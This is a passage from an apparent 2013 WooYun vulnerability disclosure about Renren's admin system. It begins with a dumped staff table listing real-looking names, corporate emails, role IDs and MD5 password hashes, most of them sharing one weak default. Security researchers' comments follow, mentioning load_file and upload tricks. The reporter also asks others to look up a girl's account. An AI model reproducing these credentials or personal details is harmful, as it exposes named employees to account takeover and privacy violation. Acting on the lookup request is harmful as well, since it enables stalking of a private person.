实习生3 ,24, e10adc3949ba59abbe56e057f20f883e shixi3 442
实习生4 ,24, e10adc3949ba59abbe56e057f20f883e shixi4 443
实习生5 ,24, e10adc3949ba59abbe56e057f20f883e shixi5 444
史浩辰 ,24, e10adc3949ba59abbe56e057f20f883e shihaochen 397
舒艺 ,6, e10adc3949ba59abbe56e057f20f883e wb.yi.shu@opi-corp.com 712
宋天翼 ,4, e10adc3949ba59abbe56e057f20f883e tianyi.song@opi-corp.com 675
隋轶 ,34, fdc2227d75b19d1924797788fdbaee45 yi.sui@opi-corp.com 635
孙晓峰 ,0, e10adc3949ba59abbe56e057f20f883e xiaofeng.sun@opi-corp.com 74
孙宇 ,44,40, 4297f44b13955235245b2497399d7a93 zhiwei.liu@renren-inc.com 755
孙宇 ,40,11,4, e10adc3949ba59abbe56e057f20f883e sun.yu@opi-corp.com 671
孙宇 ,44,40,11,4, e10adc3949ba59abbe56e057f20f883e yu.sun@opi-corp.com 650
孙振博 ,37, d41d8cd98f00b204e9800998ecf8427e zhenbo.sun@opi-corp.com 569
谭静 ,11, e10adc3949ba59abbe56e057f20f883e jing.tan@opi-corp.com 372
唐靓 ,24,6,4, e10adc3949ba59abbe56e057f20f883e liang.tang@opi-corp.com 530
唐守滨 ,34, e10adc3949ba59abbe56e057f20f883e shoubin.tang@opi-corp.com 69
特单处理 ,11, e10adc3949ba59abbe56e057f20f883e tedanchuli 719
田佳 ,44,40,4, e10adc3949ba59abbe56e057f20f883e jia.tian@opi-corp.com 733
田宇 ,38, e10adc3949ba59abbe56e057f20f883e yu.tian3@opi-corp.com 770
佟辉 ,24, e10adc3949ba59abbe56e057f20f883e tonghui 778
王超 ,4, e10adc3949ba59abbe56e057f20f883e chao.wang@opi-corp.com 481
王超 ,6, e10adc3949ba59abbe56e057f20f883e chao.wang5@opi-corp.com 652
王春翔 ,0, e10adc3949ba59abbe56e057f20f883e wangchunxiang 489
王东艳 ,11, e10adc3949ba59abbe56e057f20f883e dongyan.wang@renren-inc.com 532
王国良 ,43,42,39,4, de88e3e4ab202d87754078cbb2df6063 guoliang.wang@opi-corp.com 731
王欢 ,4, e10adc3949ba59abbe56e057f20f883e wanghuan 490
王建坤 ,0,48,47,46,45,44,43,42,41,40,39,38,37,36,35,34,33,31,24,11,6,4, c33367701511b4f6020ec61ded352059 jiankun.wang@opi-corp.com 538
王金刚 ,11, e10adc3949ba59abbe56e057f20f883e jingang.wang@opi-corp.com 570
王敬宇 ,6, e10adc3949ba59abbe56e057f20f883e wb.jingyu.wang@opi-corp.com 772
王坤 ,, e10adc3949ba59abbe56e057f20f883e kun.wang@opi-corp.com 376
王亮 ,43,42,39, de88e3e4ab202d87754078cbb2df6063 wang-liang 730
王美男 ,34, e10adc3949ba59abbe56e057f20f883e meinan.wang@opi-corp.com 520
王萌 ,43,42,39,11, e10adc3949ba59abbe56e057f20f883e wangmeng@opi-corp.com 626
王孟璞 ,11, e10adc3949ba59abbe56e057f20f883e mengpu.wang@opi-corp.com 445
王赛 ,48, e10adc3949ba59abbe56e057f20f883e sai.wang@opi-corp.com 537
王涛 ,33, e10adc3949ba59abbe56e057f20f883e tao.wang@opi-corp.com 517
王万勇 ,24,4, f6be0503eb9fcd1e7a3dc6917c4068ee wangwanyong 410
王维国 ,6, e10adc3949ba59abbe56e057f20f883e wb.weiguo.wang@opi-corp.com

修复方案:

过滤XSS,然后限制管理员权限,加强培训啦
求礼物,求人人管理加我skype whirlwind110@live.com
想要拜托你们一件事,查一个女孩的号。。。

版权声明:转载请注明来源 whirlwind@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-02-11 13:15

厂商回复:

感谢

最新状态:

暂无


漏洞评价:

评论

  1. 2013-02-07 22:34 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    oh my god,现在还能直接load_file?奇葩了

  2. 2013-02-07 22:35 | whirlwind ( 实习白帽子 | Rank:34 漏洞数:8 | 极光肖风)

    @疯狗 刚才下尿了,就是没法outfile

  3. 2013-02-07 22:45 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @whirlwind 权限没满足?还是不同机器?

  4. 2013-02-07 22:54 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    这是新年大礼包?

  5. 2013-02-07 22:56 | yhoojj ( 普通白帽子 | Rank:110 漏洞数:14 | BurNing)

    新年大礼包咯

  6. 2013-02-07 22:58 | whirlwind ( 实习白帽子 | Rank:34 漏洞数:8 | 极光肖风)

    @疯狗 魔术。。。难住了。。后台没得上传 FCK2.66

  7. 2013-02-08 08:40 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    你这不是直接不让人过年么。。

  8. 2013-02-08 13:50 | whirlwind ( 实习白帽子 | Rank:34 漏洞数:8 | 极光肖风)

    @蟋蟀哥哥 我也刚想到这个问题,,只能给人人管理说抱歉了

  9. 2013-02-08 15:13 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @whirlwind 太坏了。不让人好好过年。。

  10. 2013-02-12 00:10 | Csser ( 路人 | Rank:11 漏洞数:6 )

    洞主太坏了,人家又得加班了。

  11. 2013-02-13 09:59 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    我过年就老老实实吃肉

  12. 2013-02-13 17:34 | 不懂xx ( 路人 | Rank:22 漏洞数:5 | 虚空假面,去哪儿)

    都暴路径还能loadfile,我个日啊。

  13. 2013-02-16 23:55 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @xsser 胖了还是瘦了,胖了是吃的猪肉,瘦了是肉被女人吃了

  14. 2013-03-03 15:50 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    tags标签有点小多额。。

  15. 2013-03-04 09:33 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    你这泄露的有点多,应该打马赛克,这人人,得改多少密码啊

  16. 2013-03-04 11:11 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    证明图上露点咯

  17. 2013-03-15 15:17 | whitemonty ( 路人 | Rank:7 漏洞数:4 | Secur1ty just lik3 a girl. B0th of th3m ...)

    还是Tags标签……霸气!

  18. 2013-03-25 00:49 | 西毒 ( 普通白帽子 | Rank:221 漏洞数:33 | 心存谦卑才能不断超越自我)

    这种思路值得学习啊

  19. 2013-03-25 13:59 | Tracker ( 路人 | Rank:16 漏洞数:4 | 厂商虐我千百遍,我待厂商如初恋!)

    @蟋蟀哥哥 osc的@&Tracker 路过。。

  20. 2013-03-25 15:07 | 银冥币 ( 实习白帽子 | Rank:35 漏洞数:21 | "/upload/avatar/avatar_251_b.jpg" />)

    标签v5...